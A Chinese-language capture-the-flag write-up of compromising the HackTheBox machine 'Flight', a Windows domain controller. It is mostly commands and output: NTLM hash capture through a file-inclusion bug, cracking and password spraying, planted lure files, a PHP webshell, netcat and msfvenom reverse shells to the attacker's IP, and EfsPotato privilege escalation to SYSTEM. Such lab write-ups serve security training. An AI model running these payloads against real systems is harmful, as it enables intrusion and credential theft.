打靶记录(一五一)之HTBFlight

端口扫描

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ sudo nmap --min-rate=10000 -T4 -p- 10.10.11.187                                            
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-20 16:18 CST
Nmap scan report for 10.10.11.187
Host is up (0.28s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49694/tcp open  unknown
49720/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 34.65 seconds

LFI+NTLMv2

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ crackmapexec smb 10.10.11.187                                      
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)

得到域名:flight.htb,存入hosts

smb,ldap都无法进行枚举

竟然开放了80端口，是一个网页,看上去是一个门户网站，但是似乎没什么功能

扫描子域名

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u 'http://flight.htb/' -H "HOST:FUZZ.flight.htb" -fs 7069

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://flight.htb/
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.flight.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 7069
________________________________________________

school                  [Status: 200, Size: 3996, Words: 1045, Lines: 91, Duration: 122ms]

添加子域名,访问，是另一个页面。访问的时候有一个view参数，来访问静态页面，包含一下index.php，源码都跑出来了

<?php

ini_set('display_errors', 0);
error_reporting(E_ERROR | E_WARNING | E_PARSE); 

if(isset($_GET['view'])){
$file=$_GET['view'];
if ((strpos(urldecode($_GET['view']),'..')!==false)||
    (strpos(urldecode(strtolower($_GET['view'])),'filter')!==false)||
    (strpos(urldecode($_GET['view']),'\\')!==false)||
    (strpos(urldecode($_GET['view']),'htaccess')!==false)||
    (strpos(urldecode($_GET['view']),'.shtml')!==false)
){
    echo "<h1>Suspicious Activity Blocked!";
    echo "<h3>Incident will be reported</h3>\r\n";
}else{
    echo file_get_contents($_GET['view']);	
}
}else{
    echo file_get_contents("C:\\xampp\\htdocs\\school.flight.htb\\home.html");
}

本想尝试远程文件包含，但是只是file_get_contents，并不会解析远程脚本,但是可以远程让web服务器向我们发起smb请求进行NTLM质询。本地开启一个smb服务器,虽然\\被过滤了，但是//可以使用

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ smbserver.py share . -smb2support              
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ curl "http://school.flight.htb/index.php?view=//10.10.14.15/share/1"

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ smbserver.py share . -smb2support              
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.11.187,50392)
[*] AUTHENTICATE_MESSAGE (flight\svc_apache,G0)
[*] User G0\svc_apache authenticated successfully
[*] svc_apache::flight:aaaaaaaaaaaaaaaa:a0a010f969e3cb5c25bf8800512d2ab6:0101000000000000004e72a65b0bdb014525b70533deb1950000000001001000580066006f004d00610041006400410003001000580066006f004d006100410064004100020010004f005500630066006e00730065006200040010004f005500630066006e0073006500620007000800004e72a65b0bdb0106000400020000000800300030000000000000000000000000300000232c68f33f1ae9544d8047fed8b9ee50ae5020c6f1a794c55abb3f878d68df9f0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310035000000000000000000
[*] Closing down connection (10.10.11.187,50392)
[*] Remaining connections []
[*] Incoming connection (10.10.11.187,50393)
[*] AUTHENTICATE_MESSAGE (flight\svc_apache,G0)
[*] User G0\svc_apache authenticated successfully
[*] svc_apache::flight:aaaaaaaaaaaaaaaa:3fb9882cf14cdb9bfb750a331aebc848:010100000000000080e40aa75b0bdb012777c8b2ee34020d0000000001001000580066006f004d00610041006400410003001000580066006f004d006100410064004100020010004f005500630066006e00730065006200040010004f005500630066006e007300650062000700080080e40aa75b0bdb0106000400020000000800300030000000000000000000000000300000232c68f33f1ae9544d8047fed8b9ee50ae5020c6f1a794c55abb3f878d68df9f0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310035000000000000000000
[*] Closing down connection (10.10.11.187,50393)
[*] Remaining connections []
[*] Incoming connection (10.10.11.187,50394)
[*] AUTHENTICATE_MESSAGE (flight\svc_apache,G0)
[*] User G0\svc_apache authenticated successfully
[*] svc_apache::flight:aaaaaaaaaaaaaaaa:c1e140d4ced3257d1a22c6cd0b7dc149:010100000000000080e40aa75b0bdb0199ebb5b861b47f810000000001001000580066006f004d00610041006400410003001000580066006f004d006100410064004100020010004f005500630066006e00730065006200040010004f005500630066006e007300650062000700080080e40aa75b0bdb0106000400020000000800300030000000000000000000000000300000232c68f33f1ae9544d8047fed8b9ee50ae5020c6f1a794c55abb3f878d68df9f0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310035000000000000000000
[*] Closing down connection (10.10.11.187,50394)
[*] Remaining connections []

选一段进行破解就行

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash   
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
S@Ss!K@*t13      (svc_apache)     
1g 0:00:00:04 DONE (2024-09-20 20:51) 0.2500g/s 2665Kp/s 2665Kc/s 2665KC/s SADSAF..S4210430
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

svc_apache:S@Ss!K@*t13 ,允许smb访问

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ crackmapexec smb 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13'                    
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.187    445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ smbmap -H 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13'
<SNIP>                                                                                                                                                                            
[+] IP: 10.10.11.187:445        Name: flight.htb                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        Shared                                                  READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 
        Users                                                   READ ONLY
        Web                                                     READ ONLY

每个共享都看了一遍但是没有什么收获。现在已经有了一对凭证，可以进行进一步的枚举

┌──(mikannse㉿kali)-[~/HTB/flight/smb_USER]
└─$ impacket-lookupsid flight.htb/svc_apache:'S@Ss!K@*t13'@10.10.11.187 >sid

┌──(mikannse㉿kali)-[~/HTB/flight/smb_USER]
└─$ cat sid |grep SidTypeUser |cut -d "\\" -f2 |cut -d " " -f1 >username

尝试密码复用的可能性

┌──(mikannse㉿kali)-[~/HTB/flight/smb_USER]
└─$ crackmapexec smb 10.10.11.187 -u username -p 'S@Ss!K@*t13' --continue-on-success
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.187    445    G0               [-] flight.htb\Administrator:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\Guest:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\krbtgt:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\G0$:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [+] flight.htb\S.Moon:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [-] flight.htb\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [-] flight.htb\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE

S.Moon用户也在使用此密码,然而还是没有winrm的权限，还是smb继续枚举

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ crackmapexec smb 10.10.11.187 -u 'S.Moon' -p 'S@Ss!K@*t13' --shares
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.187    445    G0               [+] flight.htb\S.Moon:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [+] Enumerated shares
SMB         10.10.11.187    445    G0               Share           Permissions     Remark
SMB         10.10.11.187    445    G0               -----           -----------     ------
SMB         10.10.11.187    445    G0               ADMIN$                          Remote Admin
SMB         10.10.11.187    445    G0               C$                              Default share
SMB         10.10.11.187    445    G0               IPC$            READ            Remote IPC
SMB         10.10.11.187    445    G0               NETLOGON        READ            Logon server share                                                                                                    
SMB         10.10.11.187    445    G0               Shared          READ,WRITE      
SMB         10.10.11.187    445    G0               SYSVOL          READ            Logon server share                                                                                                    
SMB         10.10.11.187    445    G0               Users           READ            
SMB         10.10.11.187    445    G0               Web             READ

但是他对Shared共享拥有写文件的权限,并且这看上去像是一个所有用户共享的文件，所以极大可能是会有其他用户访问这个共享

使用这个工具能够生成用于窃取ntlm哈希的文件: https://github.com/Greenwolf/ntlm_theft.git

指定生成所有格式，指定smb服务器的IP，以及文件名

┌──(mikannse㉿kali)-[~/tools/domain/ntlm_theft]
└─$ python ntlm_theft.py -g all -s 10.10.14.15 -f hacker
Created: hacker/hacker.scf (BROWSE TO FOLDER)
Created: hacker/hacker-(url).url (BROWSE TO FOLDER)
Created: hacker/hacker-(icon).url (BROWSE TO FOLDER)
Created: hacker/hacker.lnk (BROWSE TO FOLDER)
Created: hacker/hacker.rtf (OPEN)
Created: hacker/hacker-(stylesheet).xml (OPEN)
Created: hacker/hacker-(fulldocx).xml (OPEN)
Created: hacker/hacker.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: hacker/hacker-(includepicture).docx (OPEN)
Created: hacker/hacker-(remotetemplate).docx (OPEN)
Created: hacker/hacker-(frameset).docx (OPEN)
Created: hacker/hacker-(externalcell).xlsx (OPEN)
Created: hacker/hacker.wax (OPEN)
Created: hacker/hacker.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: hacker/hacker.asx (OPEN)
Created: hacker/hacker.jnlp (OPEN)
Created: hacker/hacker.application (DOWNLOAD AND OPEN)
Created: hacker/hacker.pdf (OPEN AND ALLOW)
Created: hacker/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: hacker/Autorun.inf (BROWSE TO FOLDER)
Created: hacker/desktop.ini (BROWSE TO FOLDER)
Generation Complete.

本地开启SMB服务器,并且全部上传所生成的文件

┌──(mikannse㉿kali)-[~/tools/domain/ntlm_theft/hacker]
└─$ smbclient //10.10.11.187/Shared -U 'S.Moon'              
Password for [WORKGROUP\S.Moon]:
Try "help" to get a list of possible commands.
smb: \> prompt off
smb: \> mput *
putting file desktop.ini as \desktop.ini (0.2 kb/s) (average 0.2 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \hacker.asx
NT_STATUS_ACCESS_DENIED opening remote file \hacker.m3u
NT_STATUS_ACCESS_DENIED opening remote file \hacker.htm
NT_STATUS_ACCESS_DENIED opening remote file \hacker.rtf
NT_STATUS_ACCESS_DENIED opening remote file \zoom-attack-instructions.txt
NT_STATUS_ACCESS_DENIED opening remote file \hacker-(includepicture).docx
NT_STATUS_ACCESS_DENIED opening remote file \hacker.lnk
NT_STATUS_ACCESS_DENIED opening remote file \Autorun.inf
NT_STATUS_ACCESS_DENIED opening remote file \hacker.wax
putting file hacker.application as \hacker.application (8.0 kb/s) (average 4.1 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \hacker.pdf
NT_STATUS_ACCESS_DENIED opening remote file \hacker.scf
NT_STATUS_ACCESS_DENIED opening remote file \hacker-(remotetemplate).docx
putting file hacker.jnlp as \hacker.jnlp (0.9 kb/s) (average 3.0 kb/s)
putting file hacker-(fulldocx).xml as \hacker-(fulldocx).xml (205.5 kb/s) (average 75.9 kb/s)
putting file hacker-(stylesheet).xml as \hacker-(stylesheet).xml (0.8 kb/s) (average 62.7 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \hacker-(icon).url
NT_STATUS_ACCESS_DENIED opening remote file \hacker-(url).url
NT_STATUS_ACCESS_DENIED opening remote file \hacker-(frameset).docx
NT_STATUS_ACCESS_DENIED opening remote file \hacker-(externalcell).xlsx

获取到了c.bum用户的哈希嘿嘿

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash   
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Tikkycoll_431012284 (c.bum)     
1g 0:00:00:03 DONE (2024-09-20 21:30) 0.2702g/s 2847Kp/s 2847Kc/s 2847KC/s TinyMite1..Tiffani1432
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

服了还是没有winrm权限，继续smb的枚举

FootHold

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ crackmapexec smb 10.10.11.187 -u 'c.bum' -p 'Tikkycoll_431012284' --shares
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.187    445    G0               [+] flight.htb\c.bum:Tikkycoll_431012284 
SMB         10.10.11.187    445    G0               [+] Enumerated shares
SMB         10.10.11.187    445    G0               Share           Permissions     Remark
SMB         10.10.11.187    445    G0               -----           -----------     ------
SMB         10.10.11.187    445    G0               ADMIN$                          Remote Admin
SMB         10.10.11.187    445    G0               C$                              Default share
SMB         10.10.11.187    445    G0               IPC$            READ            Remote IPC
SMB         10.10.11.187    445    G0               NETLOGON        READ            Logon server share 
SMB         10.10.11.187    445    G0               Shared          READ,WRITE      
SMB         10.10.11.187    445    G0               SYSVOL          READ            Logon server share 
SMB         10.10.11.187    445    G0               Users           READ            
SMB         10.10.11.187    445    G0               Web             READ,WRITE

这家伙对Web共享有写的权限，那么基本就是写webshell来反弹shell了

写个一句话木马,上传至school那个虚拟主机

<?php system($_GET['cmd']); ?>

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ curl "http://school.flight.htb/shell.php?cmd=whoami"
flight\svc_apache

上传一个nc.exe用于反弹shell

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ curl "http://school.flight.htb/shell.php?cmd=nc%2Eexe%20%2De%20cmd%2Eexe%2010%2E10%2E14%2E15%20443"

拿到了flight\svc_apache的shell，但是似乎是不能进一步地利用，什么权限都没有。但其实之前我们已经拿到了c.bum用户的凭证，并且在Users目录中有他，但是在没有远程权限该怎么拿到他的shell，可以使用runas,类似linux中的sudo吧

https://github.com/antonioCoco/RunasCs

通过smb上传。并且利用他再次做一个c.bum身份的反弹shell,但是发现上传至web页面的时候竟然消失了，应该是被杀掉了

但是我在根目录创建一个文件夹之后，下载在其中不会被杀掉

C:\test>.\r.exe c.bum Tikkycoll_431012284 -r 10.10.14.15:444 cmd
.\r.exe c.bum Tikkycoll_431012284 -r 10.10.14.15:444 cmd
[*] Warning: The logon for user 'c.bum' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-6ca84$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 4784 created in background.

提权

现在收到了一个c.bum的shell,然而这个用户也没有什么特殊的权限,但是发现本地还开着一个8000端口

C:\Users\C.Bum\Desktop>netstat -ano | findstr LISTENING
netstat -ano | findstr LISTENING
<SNIP>
  TCP    [::]:3269              [::]:0                 LISTENING       644
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:8000              [::]:0                 LISTENING       4
<SNIP>

发现根目录还有一个inetpub

C:\inetpub>icacls *
icacls *
custerr BUILTIN\Users:(RX)
        BUILTIN\Administrators:(F)
        NT AUTHORITY\SYSTEM:(F)
        NT SERVICE\TrustedInstaller:(I)(F)
        NT SERVICE\TrustedInstaller:(I)(OI)(CI)(IO)(F)
        NT AUTHORITY\SYSTEM:(I)(F)
        NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
        BUILTIN\Administrators:(I)(F)
        BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
        BUILTIN\Users:(I)(RX)
        BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
        CREATOR OWNER:(I)(OI)(CI)(IO)(F)

development flight\C.Bum:(OI)(CI)(W)
            NT SERVICE\TrustedInstaller:(I)(F)
            NT SERVICE\TrustedInstaller:(I)(OI)(CI)(IO)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
            BUILTIN\Administrators:(I)(F)
            BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
            BUILTIN\Users:(I)(RX)
            BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
            CREATOR OWNER:(I)(OI)(CI)(IO)(F)

history: Access is denied.
Successfully processed 2 files; Failed processing 1 files

development这个目录c.bum是全权拥有的，也就是可以写文件，为了访问这个web服务，先做一个远程端口转发,上传一个chisel

本地先开个服务器

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ ./chisel server -p 10000 --reverse
2024/09/20 22:18:46 server: Reverse tunnelling enabled
2024/09/20 22:18:46 server: Fingerprint 9nPsGGD5rO4jhOjQvY0xTcwWu1XvXW0z+BZvVwwhEL4=
2024/09/20 22:18:46 server: Listening on http://0.0.0.0:10000

C:\test>.\chisel.exe client 10.10.14.15:10000 R:20000:127.0.0.1:8000
.\chisel.exe client 10.10.14.15:10000 R:20000:127.0.0.1:8000
2024/09/20 14:10:15 client: Connecting to ws://10.10.14.15:10000
2024/09/20 14:10:15 client: Connected (Latency 68.0988ms)

访问网站，看上去就是那个development,那么尝试上传一个webshell，这个是IIS搭建的，需要aspx,就用kali自带的这个吧

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ cp /usr/share/webshells/aspx/cmdasp.aspx .

C:\inetpub\development>powershell -c wget http://10.10.14.15:8000/cmdasp.aspx -o cmd.aspx
powershell -c wget http://10.10.14.15:8000/cmdasp.aspx -o cmd.aspx

使用nc做一个反弹shell,难绷cmd.aspx被杀掉了,提示:The resource cannot be found.

然而使用一些免杀也被杀掉，直接用反弹shell吧

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.15 LPORT=446 -a x64 -f aspx > shell.aspx 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3421 bytes

嘶，还是不行，是因为web服务挂了而不是被杀了，于是重启了靶机,反弹shell成功了，不容易

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ rlwrap -cAr nc -lvnp 446
listening on [any] 446 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.11.187] 49778
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami /all
whoami /all

USER INFORMATION
----------------

User Name                  SID                                                          
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes                                        
========================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level       Label            S-1-16-12288                                                   
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                          Alias            S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
                                           Unknown SID type S-1-5-82-0   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

基本上IIS拿到的shell都有SeImpersonatePrivilege,上PrintSpoofer,然而失败了

C:\test>.\print.exe -i -c cmd
.\print.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[-] Operation failed or timed out.

那么使用Efspotato,上传源码上去使用csc进行编译，然后配合nc执行一个反弹shell

C:\test>C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe .\EfsPotato.cs -nowarn:1691,618
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe .\EfsPotato.cs -nowarn:1691,618
Microsoft (R) Visual C# Compiler version 4.7.3190.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.

This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240

C:\test>EfsPotato.exe whoami
EfsPotato.exe whoami
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]

[+] Current user: IIS APPPOOL\DefaultAppPool
[+] Pipe: \pipe\lsarpc
[!] binding ok (handle=1046120)
[+] Get Token: 876
[!] process with pid: 5056 created.
==============================
nt authority\system

C:\test>EfsPotato.exe "nc.exe -e cmd.exe 10.10.14.15 443"
EfsPotato.exe "nc.exe -e cmd.exe 10.10.14.15 443"
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]

[+] Current user: IIS APPPOOL\DefaultAppPool
[+] Pipe: \pipe\lsarpc
[!] binding ok (handle=85fdd0)
[+] Get Token: 852
[!] process with pid: 1164 created.
==============================
[x] EfsRpcEncryptFileSrv failed: 1818

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ rlwrap -cAr nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.11.187] 49818
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\test>whoami
whoami
nt authority\system

碎碎念

真的是路径非常长的房间，不知道横向了多少个用户了，但是收获很大，多次的NTLM质询来获取哈希破解，利用smb共享的写权限进行写webshell,最后的提权很熟悉了，这个利用感谢THM!